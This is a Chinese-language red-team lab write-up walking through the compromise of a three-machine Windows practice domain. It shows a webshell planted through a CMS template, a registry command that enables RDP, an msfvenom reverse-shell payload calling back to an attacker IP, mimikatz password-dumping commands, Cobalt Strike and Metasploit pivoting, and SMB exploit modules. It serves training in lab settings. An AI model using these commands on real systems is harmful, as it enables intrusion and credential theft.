ATT&CK实战系列——红队实战（一)

一． 环境搭建

进入windows,密码：hongrisec@2019

环境配置结果：

web（win7） 
		192.168.3.104
		192.168.17.128
win2003
		192.168.17.129
win2008(域控) 
		192.168.17.130
备注：由于不是一次性做完，web机的网段3所分配的网址会有相应的变化，不影响结果

第一次配置环境发现C盘中启动phpstudy之后本机无法访问所搭建的网站
发现IP配置出问题了，虚拟机网卡配置设置成为桥接模式
配置如下（3台机器都要强制更改自动获取IP！！！）：



环境配置完成开始渗透
首先开始主机发现：
192.168.3.104

哦？4个感觉第三个和第四个最有用，先打开

发现主机为windows7 Business Edition Service Pack 1
网站服务环境
Apache 2.0 Handler（感觉还是比较老了）
主角：

进来了，先浏览下网站，找找后台或者可渗透的模块，最后准备尝试找一找cms漏洞

结果发现：

成功进入后台：

毫不犹豫选择模板页面，发现可以更改:

加入一句话木马：

备注：这里尝试过上传冰蝎马，但是由于环境问题一直不能解析

然后访问主页面：

命令执行成功，直接用菜刀进行连接getshell：
尝试远程登录3389：

没有回显，说明没有开启：

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
把0全变为一就是关闭

命令开启3389端口，有回显，成功开启

但是显示有防火墙，需要关闭才能进行远程登陆（思路：反弹shell）：
添加用户 并加入到管理员组：

添加成功：

然后我去看了看writeup:

第一种：
生成后门木马

Msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.50.128 LPORT=6666  -f exe > 123.shell

利用菜刀上传：

在虚拟终端启动成功：
Kali在msf下开启监听：
在菜刀虚拟终端中启动成功：

这里出现两个坑：
一.
进程不及时迁移是会被防火墙干掉的。

二．
被迁移进程一定查看是否具有system权限，自动迁移是随机的，比较坑，
备注：具有system的权限的进程一般在目录system下。

再就是关闭防火墙：


接下来就是通过mimikatz抓取系统用户账户密码通过开启的3389端口进行远程登陆：
抓取用户密码有3种方法：
一．

Mimikatz_command   -f   sekurlsa::searchPasswords

二．
Msv(抓取系统hash) + Kerberos(抓取系统票据)

三．
Mimikatz_command –f samdump::hashes + CMD5

知道了用户名Administrator密码hongrisec@2019

准备利用msf和cs联动进行权限维持：

MSF和cs联动
• msf连接cs
1.在队伍服务器上启动cs服务端
./teamserver 192.168.50.128（团队服务器） root(连接密码)
2.cs客户端连接攻击机（主机）
填团队服务器ip和密码，名字随便
进行CS木马上传形成连接

右击并利用access的模块进行信息收集

添加路由，挂socks4a代理

（为了让MSF其他模块能访问内网的其他主机，即50网段的攻击流量都通过已渗透的这台目标主机的meterpreter会话来传递
添加socks4a代理的目的是为了让其他软件更方便的访问到内网的其他主机的服务
（添加路由一定要在挂代理之前，因为代理需要用到路由功能））

利用arp –a 查找内网主机

发现 17.128（本机） , 17.129 , 17.130
三个内网地址

设置代理，设置成功后打开其他程序需前加上proxychains

成功，如果不能成功代理

扫描一下第二台主机开放的端口，发现有445 -> SMB共享服务开启，首先联想到经典445漏洞ms08-067：

利用 use auxiliary/scanner/smb/smb_version 可以扫描系统版本，扫描结果是win2003

找到漏洞进行利用

发现漏洞利用失败

只有再找找其他漏洞，很多，看了看writeup，可以用 use auxiliary/admin/smb/ms17_010_command 执行一些系统权限的命令，添加管理员用户尝试3389登录（先开启win2003的server服务，因为靶机一些服务没有做自启动，所以作者的漏洞列表有一些漏洞无法利用）

然而结果总是报错，没有成功过：

再看看开放端口135，尝试其他思路：

索德斯呐~
找到一个great漏洞：

执行成功，开启shell，

再就上传mimikatz进行密码抓取，不过很难受的是发现上面有两种方法都尝试失败：

最后mimikatz_command –f samdump::hashes找到几个账号，进行CMD解密发现administrator的密码为hongrisec@20191(之前配置环境的时候改了一下)

拿下第二个靶机

最后就是对域控的渗透
域控的ip是192.168.17.130，扫描下版本是win2008

进行mimikatz拿下域控